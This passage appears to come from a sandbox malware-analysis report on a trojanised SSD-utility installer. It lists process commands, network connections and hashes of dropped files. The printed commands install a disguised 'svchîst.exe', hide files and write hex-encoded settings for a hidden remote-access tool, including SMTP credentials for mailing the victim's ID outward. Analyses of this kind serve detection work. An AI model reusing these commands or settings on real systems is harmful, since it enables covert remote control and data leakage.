6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4400 -ip 4400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4400 -ip 4400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 708

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

Network

Country Destination Domain Proto
FR 2.18.109.224:443 tcp
FR 2.18.109.224:443 tcp
US 20.189.173.1:443 tcp
US 104.18.25.243:80 tcp
NL 178.79.208.1:80 tcp
FR 2.16.119.157:443 tcp
FR 2.16.119.157:443 tcp

Files

memory/2180-130-0x0000000000000000-mapping.dmp

memory/4044-131-0x0000000000000000-mapping.dmp

memory/4016-132-0x0000000000000000-mapping.dmp

memory/2716-133-0x0000000000000000-mapping.dmp

memory/4696-134-0x0000000000000000-mapping.dmp

memory/2348-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

memory/3664-138-0x0000000000000000-mapping.dmp

memory/2348-139-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2744-141-0x0000000000000000-mapping.dmp

memory/2588-142-0x0000000000000000-mapping.dmp

memory/2644-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp

MD5 3f157c5cc57b499bffd5dd720edef9e9
SHA1 6eb3096b7db925f925662480ce45f73b90f18c7b
SHA256 02d21270fef479c71d075029f9d90d8ee1433f8237b56c033d95d87b694c3c10
SHA512 dc66bfe6ea1168ba3c4449fb1d482087030e5f08396858472c71b5bfbe9a56aa264d0d405ff5b46ea2d23c8f2bc61fbe450e3ccc6fa689b5756f7ad7b1b204fe

C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp

MD5 3f157c5cc57b499bffd5dd720edef9e9
SHA1 6eb3096b7db925f925662480ce45f73b90f18c7b
SHA256 02d21270fef479c71d075029f9d90d8ee1433f8237b56c033d95d87b694c3c10
SHA512 dc66bfe6ea1168ba3c4449fb1d482087030e5f08396858472c71b5bfbe9a56aa264d0d405ff5b46ea2d23c8f2bc61fbe450e3ccc6fa689b5756f7ad7b1b204fe

memory/404-146-0x0000000000000000-mapping.dmp

memory/556-147-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

memory/3512-151-0x0000000000000000-mapping.dmp

memory/4936-152-0x0000000000000000-mapping.dmp

memory/3344-153-0x0000000000000000-mapping.dmp

memory/4748-155-0x0000000000000000-mapping.dmp

memory/1808-154-0x0000000000000000-mapping.dmp

memory/1452-156-0x0000000000000000-mapping.dmp

memory/3384-157-0x0000000000000000-mapping.dmp

memory/3608-158-0x0000000000000000-mapping.dmp

memory/816-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-HPI1H.tmp\idp.dll

MD5 461c328642b26ff2a48625c3a54c6329
SHA1 757c2f0a68df81c6ca86ec66a60868820d9445b3
SHA256 f2a19a4d71bbdfdf0ac2b0b4bfb1f07507d7dfa11d2942f215a5768a655e4835
SHA512 bbfc6761660c79e2fa5fa7970625820cf3e5c5af69ac4b5fd65ddb15883c54f1649ea85365b72945d5985e93783ee3f14d2fd2d8582fdcb175bfc13d7b41293d

C:\Users\Admin\AppData\Local\Temp\is-HPI1H.tmp\isxdl.dll

MD5 48ad1a1c893ce7bf456277a0a085ed01
SHA1 803997ef17eedf50969115c529a2bf8de585dc91
SHA256 b0cc4697b2fd1b4163fddca2050fc62a9e7d221864f1bd11e739144c90b685b3
SHA512 7c9e7fe9f00c62cccb5921cb55ba0dd96a0077ad52962473c1e79cda1fd9aa101129637043955703121443e1f8b6b2860cd4dfdb71052b20a322e05deed101a4

memory/2060-162-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/2348-164-0x0000000000400000-0x000000000045C000-memory.dmp

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/228-169-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/3464-173-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/2828-181-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\idfgvgjnghcdfb.reg

MD5 7b5e1d30e89e0ef1c86fecb977131673
SHA1 78df83f3256df2efbe483d182d4cc13afe99be2b
SHA256 b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80
SHA512 eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719

memory/2060-184-0x0000000000000000-mapping.dmp

memory/1876-183-0x0000000000000000-mapping.dmp

memory/4656-185-0x0000000000000000-mapping.dmp